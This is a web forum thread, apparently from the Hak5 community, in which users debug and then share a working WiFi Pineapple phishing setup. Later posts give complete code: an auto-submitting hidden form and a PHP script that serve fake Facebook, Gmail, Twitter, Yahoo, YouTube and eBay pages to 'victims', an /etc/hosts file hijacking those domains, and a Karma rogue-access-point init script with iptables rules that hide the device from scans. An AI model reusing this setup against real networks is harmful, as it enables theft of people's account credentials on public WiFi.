Jump to content

How Should I Be Redirecting Using Php?


Recommended Posts

Hello,

I am having the same php problems as a few other forum users so I wanted to provide a detailed analysis of the problem. Hopefully someone more knowledgeable can help.

I installed php using opkg and tested that a php file loads in Firefox which it does. I added *.php:/usr/bin/php to httpd.conf (on the Fon) and added cgi.force_redirect=0 to php.ini (the = sign is not in the instructions at http://hak5.org/hack/pineapple-phishing but is necessary otherwise the browser tries to download the php file rather than executing it).

I create dnsmasq.conf and edit it to show /#/192.168.1.1

Here is what should happen:

Client enters any URL ---> dnsmasq forwards them to 192.168.1.1 ---> the index.html file in /www issues a redirection to /www/redirect.php (code below) ---> the template for the specific redirected sites should load.

Redirect.php is:

<?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, "facebook")) { header('Location: facebook.html'); }

require('peets.html');

?>

AIUI the server URL reference is checked by strpos. If the word "facebook" is in the URL then the user is forwarded to facebook.html; otherwise the user is forwarded to peets.html.

The problem is that all websites forward to peets.html including facebook.com.

My edited HTTP headers show:

http://www.facebook.com/

GET / HTTP/1.1

Host: www.facebook.com

HTTP/1.0 200 OK

----------------------------------------------------------

http://www.facebook.com/redirect.php

GET /redirect.php HTTP/1.1

Host: www.facebook.com

HTTP/1.0 200 OK

X-Powered-By: PHP/4.4.7

Content-Type: text/html

----------------------------------------------------------

http://www.facebook.com/peets_files/lhm.css

GET /peets_files/lhm.css HTTP/1.1

Host: www.facebook.com

Referer: http://www.facebook.com/redirect.php

www.facebook.com/redirect.php should redirect to facebook.html but, as we can see, it redirects to peets.html.

Why? Thanks for the help!

Link to comment
Share on other sites

you need an exit after the header line otherwise the php script keeps running and outputs all the rest of its contents.

Or simply put else require('peets.html'); so it is part of the conditional :)

&lt;?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, "facebook"))	{ header('Location: facebook.html'); }
else { require('peets.html'); }

?&gt;	

Link to comment
Share on other sites

I'd still add an exit after the header just to for completeness.

I have tried various versions but everything (including facebook.com) redirects to peets.html whereas anything with 'facebook' in the URL should redirect to facebook.html

First I tried Darren's version:

<?php

$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook"))

{

header('Location: facebook.html');

exit;

}

require('peets.html');

?>

The I tried the same version but with HTTP_HOST rather than HTTP_REFERER.

Then I tried using 'exit' as follows for both HTTP_HOST AND HTTP_REFERER.

<?php

$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook"))

{

header('Location: facebook.html');

exit;

}

require('peets.html');

?>

Any more suggestions? Thanks!

Link to comment
Share on other sites

There's the off chance you might have a "Boolean FALSE" being returned. There's a few ways to counter this but i recommend using preg_match instead.

Try this:

&lt;?php

$ref = $_SERVER['HTTP_HOST'];

if (preg_match('/facebook/', $ref)) { 
   header('Location: facebook.html'); 
   exit; 
}

require('peets.html');

?&gt;

http://php.net/manual/en/function.strpos.php

Checkout the return value on strpos.

This happens because it finds the value 'facebook' within the first position (0).

A good way to counter it would of been doing something like this:

&lt;?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, 'facebook') !== FALSE) { 
   header('Location: facebook.html'); 
   exit; 
}

require('peets.html');


?&gt;

Link to comment
Share on other sites

There's the off chance you might have a "Boolean FALSE" being returned. There's a few ways to counter this but i recommend using preg_match instead.

Try this:

&lt;?php

$ref = $_SERVER['HTTP_HOST'];

if (preg_match('/facebook/', $ref)) { 
   header('Location: facebook.html'); 
   exit; 
}

require('peets.html');

?&gt;

http://php.net/manual/en/function.strpos.php

Checkout the return value on strpos.

This happens because it finds the value 'facebook' within the first position (0).

A good way to counter it would of been doing something like this:

&lt;?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, 'facebook') !== FALSE) { 
   header('Location: facebook.html'); 
   exit; 
}

require('peets.html');


?&gt;

I'm afraid the preg_match idea provides: Fatal error: Call to undefined function: preg_match() in /www/redirect.php on line 5

And the second code with !== FALSE redirects all traffic to peets.html as before.

I am wondering whether the problem is that because index.html sends all traffic to redirect.php that when facebook.com is entered, the redirect.php script "sees" the index.html rather than the facebook.com and so quite correctly forwards the user to peets.html.

Also: are we sure that HTTP_POST always forwards the referrer for all browsers (I am using Firefox 3.6).

Any other php ideas? Thanks as always!

Link to comment
Share on other sites

HTTP_HOST is nothing to do with the referrer, it is the domain name from the URL.

Try this:

&lt;pre&gt;
&lt;?php

$ref = $_SERVER['HTTP_HOST'];

var_dump ($ref);

?&gt;

and tell us what is displayed

Link to comment
Share on other sites

HTTP_HOST is nothing to do with the referrer, it is the domain name from the URL.

Try this:

&lt;pre&gt;
&lt;?php

$ref = $_SERVER['HTTP_HOST'];

var_dump ($ref);

?&gt;

and tell us what is displayed

I connected to the Fon and typed www.randomsite.com/code.php

As you may have assumed it provided a "NULL" output.

Link to comment
Share on other sites

Thats wrong, that value should be populated. Are you definitely using $_SERVER and not $SERVER or something like that?

Only other thing to try is:

&lt;?
phpinfo();
?&gt;

and post the output from that.

Link to comment
Share on other sites

Thats wrong, that value should be populated. Are you definitely using $_SERVER and not $SERVER or something like that?

Only other thing to try is:

&lt;?
phpinfo();
?&gt;

and post the output from that.

I am using $_SERVER - I copied and pasted your code.

The new code above just loaded a blank page but <?php phpinfo(); ?> loads the page for php 4.4.7.

Link to comment
Share on other sites

I think he meant for you to post the output of that script

Also, I'm not a php expert, but maybe try:

&lt;?php 
$ref = $_SERVER['HTTP_HOST'];
$ref2 = getenv('HTTP_HOST');
var_dump ($ref);
var_dump ($ref2);
?&gt;

Edited by UnDeFiNeD
Link to comment
Share on other sites

Thats wrong, that value should be populated. Are you definitely using $_SERVER and not $SERVER or something like that?

Only other thing to try is:

&lt;?
phpinfo();
?&gt;

and post the output from that.

I assume you mean the output of php version 4.4.7.

PHP Version 4.4.7

System Linux OpenWrt 2.6.26.5 #20 Sun May 3 13:07:35 BST 2009 mips

Build Date Dec 6 2009 02:47:47

Configure Command './configure' '--target=mips-linux' '--host=mips-linux' '--build=x86_64-linux-gnu' '--program-prefix=' '--program-suffix=' '--prefix=/usr' '--exec-prefix=/usr' '--bindir=/usr/bin' '--sbindir=/usr/sbin' '--libexecdir=/usr/lib' '--sysconfdir=/etc' '--datadir=/usr/share' '--localstatedir=/var' '--mandir=/usr/man' '--infodir=/usr/info' '--disable-nls' '--enable-shared' '--disable-static' '--disable-rpath' '--disable-debug' '--without-pear' '--with-config-file-path=/etc' '--disable-ipv6' '--enable-magic-quotes' '--enable-memory-limit' '--disable-overload' '--disable-short-tags' '--disable-ctype' '--disable-dom' '--enable-ftp=shared' '--without-gettext' '--without-iconv' '--disable-mbstring' '--disable-mbregex' '--with-openssl=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-kerberos=no' '--with-openssl-dir=/home/agb/openwrt/atheros/staging_dir/mips/usr' '--enable-session=shared' '--enable-sockets=shared' '--disable-tokenizer' '--with-zlib=/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-zlib-dir=/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-curl=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-gd=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--without-freetype-dir' '--with-jpeg-dir=/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-png-dir=/home/agb/openwrt/atheros/staging_dir/mips/usr' '--without-xpm-dir' '--without-ttf' '--without-t1lib' '--enable-gd-native-ttf' '--disable-gd-jis-conv' '--with-gmp=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-ldap=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-mysql=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-pcre-regex=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-pgsql=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--enable-xml=shared' '--with-expat-dir=/home/agb/openwrt/atheros/staging_dir/mips/usr' '--disable-cli' '--enable-cgi' '--disable-fastcgi' '--enable-force-cgi-redirect' '--enable-discard-path'

Server API CGI

Virtual Directory Support disabled

Configuration File (php.ini) Path /etc/php.ini

PHP API 20020918

PHP Extension 20020429

Zend Extension 20050606

Debug Build no

Zend Memory Manager enabled

Thread Safety disabled

Registered PHP Streams php, http, ftp, compress.zlib

Zend logo This program makes use of the Zend Scripting Language Engine:

Zend Engine v1.3.0, Copyright © 1998-2004 Zend Technologies

PHP Credits

Configuration

PHP Core

Directive Local Value Master Value

allow_call_time_pass_reference On On

allow_url_fopen On On

always_populate_raw_post_data Off Off

arg_separator.input & &

arg_separator.output & &

asp_tags Off Off

auto_append_file no value no value

auto_prepend_file no value no value

browscap no value no value

default_charset no value no value

default_mimetype text/html text/html

define_syslog_variables Off Off

disable_classes no value no value

disable_functions no value no value

display_errors On On

display_startup_errors Off Off

doc_root /www /www

docref_ext no value no value

docref_root no value no value

enable_dl On On

error_append_string no value no value

error_log no value no value

error_prepend_string no value no value

error_reporting 2039 2039

expose_php On On

extension_dir /usr/lib/php /usr/lib/php

file_uploads On On

gpc_order GPC GPC

highlight.bg #FFFFFF #FFFFFF

highlight.comment #FF8000 #FF8000

highlight.default #0000BB #0000BB

highlight.html #000000 #000000

highlight.keyword #007700 #007700

highlight.string #DD0000 #DD0000

html_errors On On

ignore_repeated_errors Off Off

ignore_repeated_source Off Off

ignore_user_abort Off Off

implicit_flush Off Off

include_path .: .:

log_errors Off Off

log_errors_max_len 1024 1024

magic_quotes_gpc On On

magic_quotes_runtime Off Off

magic_quotes_sybase Off Off

max_execution_time 30 30

max_input_time 60 60

memory_limit 8M 8M

open_basedir no value no value

output_buffering no value no value

output_handler no value no value

post_max_size 8M 8M

precision 12 12

register_argc_argv On On

register_globals Off Off

report_memleaks On On

safe_mode Off Off

safe_mode_exec_dir no value no value

safe_mode_gid Off Off

safe_mode_include_dir no value no value

sendmail_from no value no value

sendmail_path -t -i -t -i

serialize_precision 100 100

short_open_tag Off Off

SMTP localhost localhost

smtp_port 25 25

sql.safe_mode Off Off

track_errors Off Off

unserialize_callback_func no value no value

upload_max_filesize 2M 2M

upload_tmp_dir /tmp /tmp

user_dir no value no value

variables_order EGPCS EGPCS

xmlrpc_error_number 0 0

xmlrpc_errors Off Off

y2k_compliance On On

posix

Revision $Revision: 1.51.2.4.2.3 $

standard

Regex Library Bundled library enabled

Dynamic Library Support enabled

Directive Local Value Master Value

assert.active 1 1

assert.bail 0 0

assert.callback no value no value

assert.quiet_eval 0 0

assert.warning 1 1

auto_detect_line_endings 0 0

default_socket_timeout 60 60

safe_mode_allowed_env_vars PHP_ PHP_

safe_mode_protected_env_vars LD_LIBRARY_PATH LD_LIBRARY_PATH

url_rewriter.tags a=href,area=href,frame=src,input=src,form=,fieldset= a=href,area=href,frame=src,input=src,form=,fieldset=

user_agent no value no value

zlib

ZLib Support enabled

Compiled Version 1.2.3

Linked Version 1.2.3

Directive Local Value Master Value

zlib.output_compression Off Off

zlib.output_compression_level -1 -1

zlib.output_handler no value no value

Additional Modules

Module Name

Environment

Variable Value

USER root

CONFIG_cfg02f02f_timezone UTC

CONFIG_cfg024e53_port 80

HOME /

CONFIG_cfg04315a_handler logger reboot

c_file no value

realm OpenWrt

CONFIG_cfg024e53_home /www

CONFIG_cfg0638e0_handler logger factory default

TERM vt102

CONFIG_cfg04315a_button reset

CONFIG_NUM_SECTIONS 1

PATH /sbin:/usr/sbin:/bin:/usr/bin

home /www

port 80

CONFIG_cfg04315a_TYPE button

CONFIG_cfg04315a_min 0

CONFIG_cfg0638e0_button reset

SHELL /bin/sh

CONFIG_cfg04315a_max 4

CONFIG_cfg04315a_action released

CONFIG_cfg024e53_TYPE httpd

CONFIG_cfg02f02f_hostname OpenWrt

args -p 80 -h "/www" -r "OpenWrt"

hostname OpenWrt

CONFIG_cfg0638e0_TYPE button

CONFIG_SECTION cfg024e53

PWD /

CONFIG_cfg0638e0_min 5

CONFIG_cfg02f02f_TYPE system

CONFIG_cfg0638e0_max 30

CONFIG_cfg0638e0_action released

cfgtype httpd

CONFIG_SECTIONS cfg024e53

PATH_INFO no value

REQUEST_METHOD GET

REQUEST_URI /test.php

SCRIPT_FILENAME /www/test.php

SCRIPT_NAME /test.php

QUERY_STRING no value

SERVER_SOFTWARE busybox httpd/1.11.2

SERVER_PROTOCOL HTTP/1.0

GATEWAY_INTERFACE CGI/1.1

REMOTE_ADDR 192.168.1.234

REMOTE_PORT 35638

HTTP_USER_AGENT Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.17) Gecko/20110422 Ubuntu/10.04 (lucid) Firefox/3.6.17

HTTP_ACCEPT text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

HTTP_ACCEPT_LANGUAGE en-us,en;q=0.5

ORIG_PATH_INFO no value

ORIG_SCRIPT_NAME /test.php

ORIG_SCRIPT_FILENAME /www/test.php

DOCUMENT_ROOT /www

PATH_TRANSLATED no value

PHP Variables

Variable Value

_SERVER["USER"] root

_SERVER["CONFIG_cfg02f02f_timezone"] UTC

_SERVER["CONFIG_cfg024e53_port"] 80

_SERVER["HOME"] /

_SERVER["CONFIG_cfg04315a_handler"] logger reboot

_SERVER["c_file"] no value

_SERVER["realm"] OpenWrt

_SERVER["CONFIG_cfg024e53_home"] /www

_SERVER["CONFIG_cfg0638e0_handler"] logger factory default

_SERVER["TERM"] vt102

_SERVER["CONFIG_cfg04315a_button"] reset

_SERVER["CONFIG_NUM_SECTIONS"] 1

_SERVER["PATH"] /sbin:/usr/sbin:/bin:/usr/bin

_SERVER["home"] /www

_SERVER["port"] 80

_SERVER["CONFIG_cfg04315a_TYPE"] button

_SERVER["CONFIG_cfg04315a_min"] 0

_SERVER["CONFIG_cfg0638e0_button"] reset

_SERVER["SHELL"] /bin/sh

_SERVER["CONFIG_cfg04315a_max"] 4

_SERVER["CONFIG_cfg04315a_action"] released

_SERVER["CONFIG_cfg024e53_TYPE"] httpd

_SERVER["CONFIG_cfg02f02f_hostname"] OpenWrt

_SERVER["args"] -p 80 -h \"/www\" -r \"OpenWrt\"

_SERVER["hostname"] OpenWrt

_SERVER["CONFIG_cfg0638e0_TYPE"] button

_SERVER["CONFIG_SECTION"] cfg024e53

_SERVER["PWD"] /

_SERVER["CONFIG_cfg0638e0_min"] 5

_SERVER["CONFIG_cfg02f02f_TYPE"] system

_SERVER["CONFIG_cfg0638e0_max"] 30

_SERVER["CONFIG_cfg0638e0_action"] released

_SERVER["cfgtype"] httpd

_SERVER["CONFIG_SECTIONS"] cfg024e53

_SERVER["PATH_INFO"] no value

_SERVER["REQUEST_METHOD"] GET

_SERVER["REQUEST_URI"] /test.php

_SERVER["SCRIPT_FILENAME"] /www/test.php

_SERVER["SCRIPT_NAME"] /test.php

_SERVER["QUERY_STRING"] no value

_SERVER["SERVER_SOFTWARE"] busybox httpd/1.11.2

_SERVER["SERVER_PROTOCOL"] HTTP/1.0

_SERVER["GATEWAY_INTERFACE"] CGI/1.1

_SERVER["REMOTE_ADDR"] 192.168.1.234

_SERVER["REMOTE_PORT"] 35638

_SERVER["HTTP_USER_AGENT"] Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.17) Gecko/20110422 Ubuntu/10.04 (lucid) Firefox/3.6.17

_SERVER["HTTP_ACCEPT"] text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

_SERVER["HTTP_ACCEPT_LANGUAGE"] en-us,en;q=0.5

_SERVER["ORIG_PATH_INFO"] no value

_SERVER["ORIG_SCRIPT_NAME"] /test.php

_SERVER["ORIG_SCRIPT_FILENAME"] /www/test.php

_SERVER["DOCUMENT_ROOT"] /www

_SERVER["PATH_TRANSLATED"] no value

_SERVER["PHP_SELF"] /test.php

_SERVER["argv"]

Array

(

)

_SERVER["argc"] 0

_ENV["USER"] root

_ENV["CONFIG_cfg02f02f_timezone"] UTC

_ENV["CONFIG_cfg024e53_port"] 80

_ENV["HOME"] /

_ENV["CONFIG_cfg04315a_handler"] logger reboot

_ENV["c_file"] no value

_ENV["realm"] OpenWrt

_ENV["CONFIG_cfg024e53_home"] /www

_ENV["CONFIG_cfg0638e0_handler"] logger factory default

_ENV["TERM"] vt102

_ENV["CONFIG_cfg04315a_button"] reset

_ENV["CONFIG_NUM_SECTIONS"] 1

_ENV["PATH"] /sbin:/usr/sbin:/bin:/usr/bin

_ENV["home"] /www

_ENV["port"] 80

_ENV["CONFIG_cfg04315a_TYPE"] button

_ENV["CONFIG_cfg04315a_min"] 0

_ENV["CONFIG_cfg0638e0_button"] reset

_ENV["SHELL"] /bin/sh

_ENV["CONFIG_cfg04315a_max"] 4

_ENV["CONFIG_cfg04315a_action"] released

_ENV["CONFIG_cfg024e53_TYPE"] httpd

_ENV["CONFIG_cfg02f02f_hostname"] OpenWrt

_ENV["args"] -p 80 -h \"/www\" -r \"OpenWrt\"

_ENV["hostname"] OpenWrt

_ENV["CONFIG_cfg0638e0_TYPE"] button

_ENV["CONFIG_SECTION"] cfg024e53

_ENV["PWD"] /

_ENV["CONFIG_cfg0638e0_min"] 5

_ENV["CONFIG_cfg02f02f_TYPE"] system

_ENV["CONFIG_cfg0638e0_max"] 30

_ENV["CONFIG_cfg0638e0_action"] released

_ENV["cfgtype"] httpd

_ENV["CONFIG_SECTIONS"] cfg024e53

_ENV["PATH_INFO"] no value

_ENV["REQUEST_METHOD"] GET

_ENV["REQUEST_URI"] /test.php

_ENV["SCRIPT_FILENAME"] /www/test.php

_ENV["SCRIPT_NAME"] /test.php

_ENV["QUERY_STRING"] no value

_ENV["SERVER_SOFTWARE"] busybox httpd/1.11.2

_ENV["SERVER_PROTOCOL"] HTTP/1.0

_ENV["GATEWAY_INTERFACE"] CGI/1.1

_ENV["REMOTE_ADDR"] 192.168.1.234

_ENV["REMOTE_PORT"] 35638

_ENV["HTTP_USER_AGENT"] Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.17) Gecko/20110422 Ubuntu/10.04 (lucid) Firefox/3.6.17

_ENV["HTTP_ACCEPT"] text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

_ENV["HTTP_ACCEPT_LANGUAGE"] en-us,en;q=0.5

_ENV["ORIG_PATH_INFO"] no value

_ENV["ORIG_SCRIPT_NAME"] /test.php

_ENV["ORIG_SCRIPT_FILENAME"] /www/test.php

_ENV["DOCUMENT_ROOT"] /www

_ENV["PATH_TRANSLATED"] no value

Link to comment
Share on other sites

what URL did you use to get that page?

I connected the Fon to eth0 then typed www.anysitewhatsoever.com/test.php where test.php runs the code:

<?php phpinfo(); ?>

test.php is of course in /www.

I can use any site because of the dnsmasq.conf address=/#/192.168.1.1

In http://hak5.org/hack/auto-rickrolling-wifi-pineapple Darren uses <?php phpinfo(); ?> just to check that PHP is installed correctly.

Should I have done something else? Thanks again.

Edited by billyblaxsta
Link to comment
Share on other sites

I don't understand what is going on, the domain name should be passed through to a _SERVER variable but doesn't appear to be. Anyone else got any idea why this is failing as I'm out of ideas.

Link to comment
Share on other sites

It looks like the "HTTP_HOST" variable isnt set by either this version of php or by the server (or whatever sets it lol)

I threw together a quick rough fix for you though. I say rough because the victims will need to have javascript enabled...

index.html

&lt;html&gt;
&lt;head&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;form action="index.php" method="POST" name="theform"&gt;
&lt;input type="text" name="host" value=""/&gt;
&lt;/form&gt;
&lt;script type="text/javascript"&gt;
document.theform.host.setAttribute("value",window.location);
document.theform.submit();
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;

index.php (named it index.php because it doesnt redirect, it displays the contents of the phishing pages instead of redirecting to them)

&lt;?php
error_reporting(0);
$ref = $_POST['host'];

if (strpos($ref, "facebook.com"))		{ include('facebook.html'); }
else if (strpos($ref, "twitter.com"))		{ include('twitter.html'); }
else if (strpos($ref, "gmail.com") || 
	  strpos($ref, "mail.google.com"))	{ include('gmail.html'); }
else if (strpos($ref, "yahoo.com"))		{ include('yahoo.html'); }
else if (strpos($ref, "youtube.com"))		{ include('youtube.html'); }
else						{ include('peets.html'); }
?&gt;

Edited by UnDeFiNeD
Link to comment
Share on other sites

It looks like the "HTTP_HOST" variable isnt set by either this version of php or by the server (or whatever sets it lol)

I'll look at your code shortly thanks but just a thought:

If HTTP_HOST isn't set might not variables like HTTP_X_FORWARDED_FOR, HTTP_X_FORWARDED_HOST, and HTTP_X_FORWARDED_SERVER work instead?

Or, maybe download a PHP version which does use the HTTP_HOST variable?

Link to comment
Share on other sites

It looks like the "HTTP_HOST" variable isnt set by either this version of php or by the server (or whatever sets it lol)

I threw together a quick rough fix for you though. I say rough because the victims will need to have javascript enabled...

index.html

&lt;html&gt;
&lt;head&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;form action="index.php" method="POST" name="theform"&gt;
&lt;input type="text" name="host" value=""/&gt;
&lt;/form&gt;
&lt;script type="text/javascript"&gt;
document.theform.host.setAttribute("value",window.location);
document.theform.submit();
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;

index.php (named it index.php because it doesnt redirect, it displays the contents of the phishing pages instead of redirecting to them)

&lt;?php
error_reporting(0);
$ref = $_POST['host'];

if (strpos($ref, "facebook.com"))		{ include('facebook.html'); }
else if (strpos($ref, "twitter.com"))		{ include('twitter.html'); }
else if (strpos($ref, "gmail.com") || 
	  strpos($ref, "mail.google.com"))	{ include('gmail.html'); }
else if (strpos($ref, "yahoo.com"))		{ include('yahoo.html'); }
else if (strpos($ref, "youtube.com"))		{ include('youtube.html'); }
else						{ include('peets.html'); }
?&gt;

Thanks - that worked a treat. Much appreciated! And thanks also to Robin for all your help.

Link to comment
Share on other sites

  • 4 weeks later...

This is how i did it..

root@router:/# cat /etc/config/httpd 
config 'httpd'
	option 'port' '1338'
	option 'home' '/www'

config 'httpd'
        option 'port' '80'
        option 'home' '/wwwguest'

root@router:/# cat /etc/hosts
#----------------------------------------
# Local
#----------------------------------------
127.0.0.1 localhost.
10.1.0.2 router jasager
#----------------------------------------
# Gateway and services
#----------------------------------------
10.1.0.1 gateway 
78.24.191.177 downloads.openwrt.org
46.4.11.11 downloads.x-wrt.org
#----------------------------------------
# Phishing
#----------------------------------------
10.1.0.2 www.facebook.com facebook.com
10.1.0.2 www.facebook.dk facebook.dk
10.1.0.2 da-dk.facebook.com
#----------------------------------------
10.1.0.2 www.twitter.com twitter.com
10.1.0.2 www.twitter.dk twitter.dk
#----------------------------------------
10.1.0.2 www.gmail.dk gmail.dk
10.1.0.2 www.gmail.com gmail.com
10.1.0.2 mail.google.com
10.1.0.2 mail.google.dk
#----------------------------------------
#10.1.0.2 plus.google.com plus.google.dk
#----------------------------------------
10.1.0.2 www.youtube.com youtube.com
#----------------------------------------
10.1.0.2 www.ebay.com ebay.com
#----------------------------------------
#10.1.0.2 www.yahoo.com yahoo.com
#----------------------------------------
#10.1.0.2 www.linkedin.com linkedin.com
#----------------------------------------

root@router:/# cat /etc/php.ini |egrep www|cgi.force_redirect
doc_root = /wwwguest
cgi.force_redirect = 0

[code]root@router:/# cat /wwwguest/index.html 
&lt;html&gt;&lt;head&gt;&lt;/head&gt;&lt;body&gt;
&lt;div id="hideme"&gt;
 &lt;form action="index.php" method="POST" name="theform"&gt;
  &lt;input type="text" name="host" style="width:0px;" value="" type="hidden"/&gt;
 &lt;/form&gt;
&lt;/div&gt;

&lt;script type="text/javascript"&gt;
document.getElementById('hideme').style.display='none';

function left(str,n){
if (n &lt;= 0)
 return "";
else if (n &gt; String(str).length)
 return str;
else
 return String(str).substring(0,n);
}

function right(str,n){
if (n &lt;= 0)
 return "";
else if (n &gt; String(str).length)
 return str;
else {
 var iLen = String(str).length;
 return String(str).substring(iLen,iLen-n);
 }
}

var the_url = window.location.href;
var the_url_len = the_url.length-7;
the_url = right(the_url,the_url_len)

var where_is_slash=the_url.indexOf('/');
the_url = left(the_url,where_is_slash);

document.theform.host.setAttribute("value","http://"+the_url);
document.theform.submit(); 
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;

root@router:/# cat /wwwguest/index.php
&lt;?php

error_reporting(0);
$ref = strtolower ( $_POST['host'] );

//$header = str_replace("http://", "https://", $ref);
//header ("Location: $header/index.php");

if ("$ref" != "") {
 if (strpos($ref,"facebook.com")||strpos($ref,"www.facebook.com")||strpos($ref,"facebook.dk")||strpos($ref,"www.facebook.com.")){include('facebook.html');}
 else if (strpos($ref,"gmail.com")||strpos($ref,"www.gmail.com")||strpos($ref,"gmail.dk")||strpos($ref,"www.gmail.dk")||strpos($ref,"mail.google")){include('gmail.html');}
 else if (strpos($ref,"twitter.com")||strpos($ref,"www.twitter.com")){include('twitter.html');} 
 else if (strpos($ref,"youtube.com")||strpos($ref,"www.youtube.com")){include('youtube.html');}
 else if (strpos($ref,"ebay.com")||strpos($ref,"www.ebay.com")){include('ebay.html');}
 else {include('peets.html');}
} 
else {
echo '&lt;html&gt;&lt;head&gt;';
echo "&lt;meta http-equiv=\"REFRESH\" content=\"0;url=/index.html\"&gt;";
echo '&lt;/head&gt;&lt;body&gt;&lt;/body&gt;&lt;/html&gt;';
}
?&gt;

root@router:/etc/init.d# cat /etc/init.d/jasager 
#!/bin/sh /etc/rc.common
# Copyright (C) 2008 dninja@gmail.com
START=50

start() {
	include /lib/network
	scan_interfaces
	/karma/bin/create_option_list.rb
	[ -d /karma/www -a -f /karma/etc/httpd.conf ] &amp;&amp; httpd -p 1337 -h /karma/www -r karma -c /karma/etc/httpd.conf
# ORIGINAL	iptables -I FORWARD -i ath0 -o br-lan -j ACCEPT
        #-------------------------------------------------------------------------------
        # PREPARE KARMA
        #-------------------------------------------------------------------------------
         iwpriv ath0 maccmd 3;                              sleep 1 # Clear the MAC ignore list
         iwpriv ath0 maccmd 2;                              sleep 1 # To make the list a blacklist. 
         # iwpriv ath0 maccmd 1;                            sleep 1 # To make the list a whitelist.
         iwpriv ath0 addmac 00:12:34:13:37:12;              sleep 1 # Ignore backtrack wifi interface
         # iwpriv ath0 addkarmassid "Free Internet";        sleep 1 # Ignore my wifi does not work :(
         iwpriv ath0 karma 1;                               sleep 1 # Start karma
         ifconfig ath0 up;                                  sleep 1 # Activate ath0 interface
         #-------------------------------------------------------------------------------
         # IPTABLES VARIABLES
         #-------------------------------------------------------------------------------
         IPT='/usr/sbin/iptables' 
         GATEWAY="10.1.0.1"                             # To the internet ( my thinkpad )
         JASAGER="10.1.0.2"                             # To the targets
         #-------------------------------------------------------------------------------
         # REMOVE ALL IPTABLES RULES
         #-------------------------------------------------------------------------------
         # reset the default policies in the filter table.
         $IPT -P INPUT ACCEPT
         $IPT -P FORWARD ACCEPT
         $IPT -P OUTPUT ACCEPT
         # reset the default policies in the nat table.
         $IPT -t nat -P PREROUTING ACCEPT
         $IPT -t nat -P POSTROUTING ACCEPT
         $IPT -t nat -P OUTPUT ACCEPT
         # reset the default policies in the mangle table.
         $IPT -t mangle -P PREROUTING ACCEPT
         $IPT -t mangle -P POSTROUTING ACCEPT
         $IPT -t mangle -P INPUT ACCEPT
         $IPT -t mangle -P OUTPUT ACCEPT
         $IPT -t mangle -P FORWARD ACCEPT
         # flush all the rules in the filter and nat tables.
         $IPT -F
         $IPT -t nat -F
         $IPT -t mangle -F
         # erase all chains that's not default in filter and nat table.
         $IPT -X
         $IPT -t nat -X
         $IPT -t mangle -X
         #-------------------------------------------------------------------------------
         # Allow localhost
         #-------------------------------------------------------------------------------
         $IPT -A INPUT -s 127.0.0.0/8 -i lo -j ACCEPT
         $IPT -A OUTPUT -s 127.0.0.0/8 -o lo -j ACCEPT
         #-------------------------------------------------------------------------------
         # Allow DNS
         #-------------------------------------------------------------------------------
         $IPT -A INPUT -i br-lan -d ${JASAGER} -m udp -p udp --dport 53 -j ACCEPT
         $IPT -A INPUT -i br-lan -d ${JASAGER} -m tcp -p tcp --dport 53 -j ACCEPT
         #-------------------------------------------------------------------------------
         # BLOCK STUFF
         #-------------------------------------------------------------------------------
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --syn -j DROP                     # Block SYN
         $IPT -A INPUT -i eth0 -d ${JASAGER} -f -j DROP                               # Block Fragments
         # Block NMAP Scans:
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP          #
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL ALL -j DROP                  #
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL NONE -j DROP                 # NULL
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags SYN,RST SYN,RST -j DROP          #
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP          # XMAS
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags FIN,ACK FIN -j DROP              # FIN
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP  #
         $IPT -A INPUT -d ${JASAGER} -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT # OK for http requests
         #-------------------------------------------------------------------------------
         # iptables -A INPUT -m limit --limit 15/minute -j LOG --log-level 7 --log-prefix "Dropped by firewall:"
         $IPT -A INPUT -s ! ${GATEWAY} -d ${JASAGER} -m state --state NEW -j DROP   # NEW only from Gateway
         #-------------------------------------------------------------------------------
         /usr/sbin/iwconfig ath0 txpower 18
         #-------------------------------------------------------------------------------

	logread -f | awk '{if ($0 ~ /(KARMA: |DHCPACK|DHCPDISCOVER|DHCPOFFER|DHCPREQUEST)/) {sub (/ \(.*\).*: /, ": ", $0); print $0 ;}} ' &gt; /tmp/status.log &amp;
	tail -f /tmp/status.log | /karma/bin/logwatch &amp;
}

stop() {
	killall httpd
}

